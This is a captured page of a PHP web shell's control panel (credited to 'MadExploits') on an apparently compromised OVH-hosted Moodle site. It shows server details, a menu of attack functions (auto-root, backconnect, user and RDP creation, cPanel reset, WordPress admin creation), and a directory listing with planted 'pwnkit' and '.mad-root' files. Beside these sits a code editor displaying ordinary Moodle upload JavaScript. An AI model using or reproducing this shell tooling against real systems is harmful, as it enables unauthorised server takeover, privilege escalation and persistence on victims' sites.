Linux webm001.cluster111.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.111.20.1 | : 216.73.216.115
Cant Read [ /etc/named.conf ]
7.4.33
osteocoeek
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
osteocoeek /
moodledata /
localcache /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
1149851bb9c4171367f187b7d9f5ad...
15.01
KB
-rw-rw-rw-
2785abcb493370e0dc8e35fa4ef2a6...
93.91
KB
-rw-rw-rw-
29a427a7e3873b52f1f81ba0c31228...
31.38
KB
-rw-rw-rw-
2bdca94e1b6a15382e2f136b1ee8b5...
4.46
KB
-rw-rw-rw-
4bb2849484a52aacadf7a5ffeafc38...
1.59
KB
-rw-rw-rw-
5090ed6315e8c6c631ad5fc1085589...
12.87
KB
-rw-rw-rw-
5b06aa800dbf89b51d50540bf4f043...
15.01
KB
-rw-rw-rw-
64bb0370b7e011afa43d146074ae3a...
15.84
KB
-rw-rw-rw-
6bfd3080ff995ef593d1a11159799e...
93.91
KB
-rw-rw-rw-
6ed16c9023330d06d19876f469a06c...
6.28
KB
-rw-rw-rw-
7339c3574122b02b4ea457df8ca8fe...
46.62
KB
-rw-rw-rw-
7d2c2d5cbd4ab48c4e3f5355dd0a1c...
1.58
KB
-rw-rw-rw-
8a9aed72a9e92e016aae1062e6d31b...
1.32
KB
-rw-rw-rw-
8c075d77d1b9876df09bed791e9970...
775
B
-rw-rw-rw-
adminer.php
0
B
-rw-r--r--
b690174ce3c9c118777cbc91b49f76...
9.62
KB
-rw-rw-rw-
cf038beaf715d73b5243a1131fba3c...
57
B
-rw-rw-rw-
d5c15d416abd103d7e4fbf78006587...
57
B
-rw-rw-rw-
e477f5c3dd9618f7749791d64a3a7d...
25.14
KB
-rw-rw-rw-
ed3d53fe4dff9e3f8bc6dde69ef23f...
31.38
KB
-rw-rw-rw-
f14b6641028140218595501d649031...
31.38
KB
-rw-rw-rw-
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 5090ed6315e8c6c631ad5fc10855897efbc19ca5
M.form_dndupload={};M.form_dndupload.init=function(Y,options){var dnduploadhelper={Y:null,url:M.cfg.wwwroot+'/repository/repository_ajax.php?action=upload',options:{},itemid:null,acceptedtypes:[],maxbytes:0,areamaxbytes:-1,clientid:'',repositoryid:0,container:null,filemanager:null,callback:null,entercount:0,pageentercount:0,progressbars:{},init:function(Y,options){this.Y=Y;if(!this.browser_supported()){Y.one('body').addClass('dndnotsupported');return};this.repositoryid=this.get_upload_repositoryid(options.repositories);if(!this.repositoryid){Y.one('body').addClass('dndnotsupported');return};Y.one('body').addClass('dndsupported');this.options=options;this.acceptedtypes=options.acceptedtypes;this.clientid=options.clientid;this.maxbytes=options.maxbytes;this.areamaxbytes=options.areamaxbytes;this.itemid=options.itemid;this.author=options.author;this.container=this.Y.one('#'+options.containerid);if(options.filemanager){this.filemanager=options.filemanager}else if(options.formcallback){this.callback=options.formcallback}else{if(M.cfg.developerdebug)alert('dndupload: Need to define either options.filemanager or options.formcallback');return};this.init_events();this.init_page_events()},browser_supported:function(){if(typeof FileReader=='undefined')return false;if(typeof FormData=='undefined')return false;return true},get_upload_repositoryid:function(repositories){for(var i in repositories)if(repositories[i].type=="upload")return repositories[i].id;return false},init_events:function(){this.Y.on('dragenter',this.drag_enter,this.container,this);this.Y.on('dragleave',this.drag_leave,this.container,this);this.Y.on('dragover',this.drag_over,this.container,this);this.Y.on('drop',this.drop,this.container,this)},init_page_events:function(){this.Y.on('dragenter',this.drag_enter_page,'body',this);this.Y.on('dragleave',this.drag_leave_page,'body',this)},is_disabled:function(){return(this.container.ancestor('.fitem.disabled')!=null)},drag_enter_page:function(e){if(this.is_disabled())return false;if(!this.has_files(e))return false;this.pageentercount++;if(this.pageentercount>=2){this.pageentercount=2;return false};this.show_drop_target();return false},drag_leave_page:function(e){this.pageentercount--;if(this.pageentercount==1)return false;this.pageentercount=0;this.hide_drop_target();return false},check_drag:function(e){if(this.is_disabled())return false;if(!this.has_files(e))return false;e.preventDefault();e.stopPropagation();return true},drag_enter:function(e){if(!this.check_drag(e))return true;this.entercount++;if(this.entercount>=2){this.entercount=2;return false};this.pageentercount=2;this.show_drop_target();this.show_upload_ready();return false},drag_leave:function(e){if(!this.check_drag(e))return true;this.entercount--;if(this.entercount==1)return false;this.entercount=0;this.hide_upload_ready();return false},drag_over:function(e){if(!this.check_drag(e))return true;return false},drop:function(e){if(!this.check_drag(e,true))return true;this.entercount=0;this.pageentercount=0;this.hide_upload_ready();this.hide_drop_target();var files=e._event.dataTransfer.files;if(this.filemanager){var options={files:files,options:this.options,repositoryid:this.repositoryid,currentfilecount:this.filemanager.filecount,currentfiles:this.filemanager.options.list,callback:Y.bind('update_filemanager',this),callbackprogress:Y.bind('update_progress',this),callbackcancel:Y.bind('hide_progress',this)};this.clear_progress();this.show_progress();var uploader=new dnduploader(options);uploader.start_upload()}else if(files.length>=1){options={files:[files[0]],options:this.options,repositoryid:this.repositoryid,currentfilecount:0,currentfiles:[],callback:Y.bind('update_filemanager',this),callbackprogress:Y.bind('update_progress',this),callbackcancel:Y.bind('hide_progress',this)};this.clear_progress();this.show_progress();uploader=new dnduploader(options);uploader.start_upload()};return false},has_files:function(e){var types=e._event.dataTransfer.types||[];for(var i=0;i<types.length;i++)if(types[i]=='Files')return true;return false},show_drop_target:function(){this.container.addClass('dndupload-ready')},hide_drop_target:function(){this.container.removeClass('dndupload-ready')},show_upload_ready:function(){this.container.addClass('dndupload-over')},hide_upload_ready:function(){this.container.removeClass('dndupload-over')},show_progress:function(){this.container.addClass('dndupload-inprogress')},hide_progress:function(){this.container.removeClass('dndupload-inprogress')},update_filemanager:function(params){this.hide_progress();if(this.filemanager){this.filemanager.filepicker_callback()}else if(this.callback)this.callback(params)},clear_progress:function(){var filename;for(filename in this.progressbars)if(this.progressbars.hasOwnProperty(filename)){this.progressbars[filename].progressouter.remove(true);delete this.progressbars[filename]}},update_progress:function(filename,percent){if(this.progressbars[filename]===undefined){var dispfilename=filename;if(dispfilename.length>50)dispfilename=dispfilename.substr(0,49)+'…';var progressouter=this.container.create('<span>'+dispfilename+': <span class="dndupload-progress-outer"><span class="dndupload-progress-inner"> </span></span><br /></span>'),progressinner=progressouter.one('.dndupload-progress-inner'),progresscontainer=this.container.one('.dndupload-progressbars');progresscontainer.appendChild(progressouter);this.progressbars[filename]={progressouter:progressouter,progressinner:progressinner}};this.progressbars[filename].progressinner.setStyle('width',percent+'%')}},dnduploader=function(options){dnduploader.superclass.constructor.apply(this,arguments)};Y.extend(dnduploader,Y.Base,{api:M.cfg.wwwroot+'/repository/repository_ajax.php',options:{},callback:null,callbackprogress:null,callbackcancel:null,files:null,repositoryid:0,currentfiles:null,currentfilecount:0,currentareasize:0,uploadqueue:[],renamequeue:[],queuesize:0,overwriteall:false,renameall:false,initializer:function(params){this.options=params.options;this.repositoryid=params.repositoryid;this.callback=params.callback;this.callbackprogress=params.callbackprogress;this.callbackcancel=params.callbackcancel;this.currentfiles=params.currentfiles;this.currentfilecount=params.currentfilecount;this.currentareasize=0;for(var i=0;i<this.currentfiles.length;i++)this.currentareasize+=this.currentfiles[i].size;if(!this.initialise_queue(params.files))if(this.callbackcancel)this.callbackcancel()},start_upload:function(){this.process_renames()},print_msg:function(msg,type){var header=M.util.get_string('error','moodle');if(type!='error'){type='info';header=M.util.get_string('info','moodle')};if(!this.msg_dlg){this.msg_dlg_node=Y.Node.createWithFilesSkin(M.core_filepicker.templates.message);this.msg_dlg_node.generateID();this.msg_dlg=new Y.Panel({srcNode:this.msg_dlg_node,zIndex:8e3,centered:true,modal:true,visible:false,render:true});this.msg_dlg.plug(Y.Plugin.Drag,{handles:['#'+this.msg_dlg_node.get('id')+' .yui3-widget-hd']});this.msg_dlg_node.one('.fp-msg-butok').on('click',function(e){e.preventDefault();this.msg_dlg.hide()},this)};this.msg_dlg.set('headerContent',header);this.msg_dlg_node.removeClass('fp-msg-info').removeClass('fp-msg-error').addClass('fp-msg-'+type);this.msg_dlg_node.one('.fp-msg-text').setContent(msg);this.msg_dlg.show()},initialise_queue:function(files){this.uploadqueue=[];this.renamequeue=[];this.queuesize=0;var i;for(i=0;i<files.length;i++){if(this.options.maxbytes>0&&files[i].size>this.options.maxbytes){this.print_msg(M.util.get_string('maxbytesforfile','moodle',files[i].name),'error');this.uploadqueue=[];return};if(this.has_name_clash(files[i].name)){this.renamequeue.push(files[i])}else if(!this.add_to_upload_queue(files[i],files[i].name,false))return false;this.queuesize+=files[i].size};return true},add_to_upload_queue:function(file,filename,overwrite){if(!overwrite)this.currentfilecount++;if(this.options.maxfiles>=0&&this.currentfilecount>this.options.maxfiles){this.uploadqueue=[];this.renamequeue=[];this.print_msg(M.util.get_string('maxfilesreached','moodle',this.options.maxfiles),'error');return false};if(this.options.areamaxbytes>-1){var sizereached=this.currentareasize+this.queuesize+file.size;if(sizereached>this.options.areamaxbytes){this.uploadqueue=[];this.renamequeue=[];this.print_msg(M.util.get_string('maxareabytesreached','moodle'),'error');return false}};this.uploadqueue.push({file:file,filename:filename,overwrite:overwrite});return true},process_renames:function(){if(this.renamequeue.length==0){this.do_upload();return};var multiplefiles=(this.renamequeue.length>1),file=this.renamequeue.shift(),newname=this.generate_unique_name(file.name);if(this.overwriteall){this.add_to_upload_queue(file,file.name,true);this.process_renames();return};if(this.renameall){this.add_to_upload_queue(file,newname,false);this.process_renames();return};var self=this,process_dlg_node;if(multiplefiles){process_dlg_node=Y.Node.createWithFilesSkin(M.core_filepicker.templates.processexistingfilemultiple)}else process_dlg_node=Y.Node.createWithFilesSkin(M.core_filepicker.templates.processexistingfile);var node=process_dlg_node;node.generateID();var process_dlg=new Y.Panel({srcNode:node,headerContent:M.util.get_string('fileexistsdialogheader','repository'),zIndex:8e3,centered:true,modal:true,visible:false,render:true,buttons:{}});process_dlg.plug(Y.Plugin.Drag,{handles:['#'+node.get('id')+' .yui3-widget-hd']});node.one('.fp-dlg-butoverwrite').on('click',function(e){e.preventDefault();process_dlg.hide();self.add_to_upload_queue(file,file.name,true);self.process_renames()},this);node.one('.fp-dlg-butrename').on('click',function(e){e.preventDefault();process_dlg.hide();self.add_to_upload_queue(file,newname,false);self.process_renames()},this);node.one('.fp-dlg-butcancel').on('click',function(e){e.preventDefault();process_dlg.hide();if(self.callbackcancel)self.callbackcancel()},this);if(this.currentfilecount==this.options.maxfiles){node.one('.fp-dlg-butrename').setStyle('display','none');if(multiplefiles)node.one('.fp-dlg-butrenameall').setStyle('display','none')};if(multiplefiles){node.one('.fp-dlg-butoverwriteall').on('click',function(e){e.preventDefault();process_dlg.hide();this.overwriteall=true;self.add_to_upload_queue(file,file.name,true);self.process_renames()},this);node.one('.fp-dlg-butrenameall').on('click',function(e){e.preventDefault();process_dlg.hide();this.renameall=true;self.add_to_upload_queue(file,newname,false);self.process_renames()},this)};node.one('.fp-dlg-text').setContent(M.util.get_string('fileexists','moodle',file.name));process_dlg_node.one('.fp-dlg-butrename').setContent(M.util.get_string('renameto','repository',newname));process_dlg.after('visibleChange',function(e){if(!process_dlg.get('visible'))process_dlg.destroy(true)});process_dlg.show()},has_name_clash:function(filename){var i;for(i=0;i<this.currentfiles.length;i++)if(filename==this.currentfiles[i].filename)return true;for(i=0;i<this.uploadqueue.length;i++)if(filename==this.uploadqueue[i].filename)return true;return false},generate_unique_name:function(filename){while(this.has_name_clash(filename))filename=increment_filename(filename);return filename},do_upload:function(lastresult){if(this.uploadqueue.length>0){var filedetails=this.uploadqueue.shift();this.upload_file(filedetails.file,filedetails.filename,filedetails.overwrite)}else this.uploadfinished(lastresult)},uploadfinished:function(lastresult){this.callback(lastresult)},upload_file:function(file,filename,overwrite){var xhr=new XMLHttpRequest(),self=this;xhr.upload.addEventListener('progress',function(e){if(e.lengthComputable&&self.callbackprogress){var percentage=Math.round((e.loaded*100)/e.total);self.callbackprogress(filename,percentage)}},false);xhr.onreadystatechange=function(){if(xhr.readyState==4)if(xhr.status==200){var result=JSON.parse(xhr.responseText);if(result)if(result.error){self.print_msg(result.error,'error');self.uploadfinished()}else{if(result.event=='fileexists'){result.file=result.newfile.filename;result.url=result.newfile.url};result.client_id=self.options.clientid;if(self.callbackprogress)self.callbackprogress(filename,100)};self.do_upload(result)}else{self.print_msg(M.util.get_string('serverconnection','error'),'error');self.uploadfinished()}};var formdata=new FormData();formdata.append('action','upload');formdata.append('repo_upload_file',file);formdata.append('sesskey',M.cfg.sesskey);formdata.append('repo_id',this.repositoryid);formdata.append('itemid',this.options.itemid);if(this.options.author)formdata.append('author',this.options.author);if(this.options.filemanager)formdata.append('savepath',this.options.filemanager.currentpath);formdata.append('title',filename);if(overwrite)formdata.append('overwrite',1);if(this.options.contextid)formdata.append('ctx_id',this.options.contextid);if(this.options.acceptedtypes.constructor==Array){for(var i=0;i<this.options.acceptedtypes.length;i++)formdata.append('accepted_types[]',this.options.acceptedtypes[i])}else formdata.append('accepted_types[]',this.options.acceptedtypes);xhr.open("POST",this.api,true);xhr.send(formdata);return true}});dnduploadhelper.init(Y,options)}
Close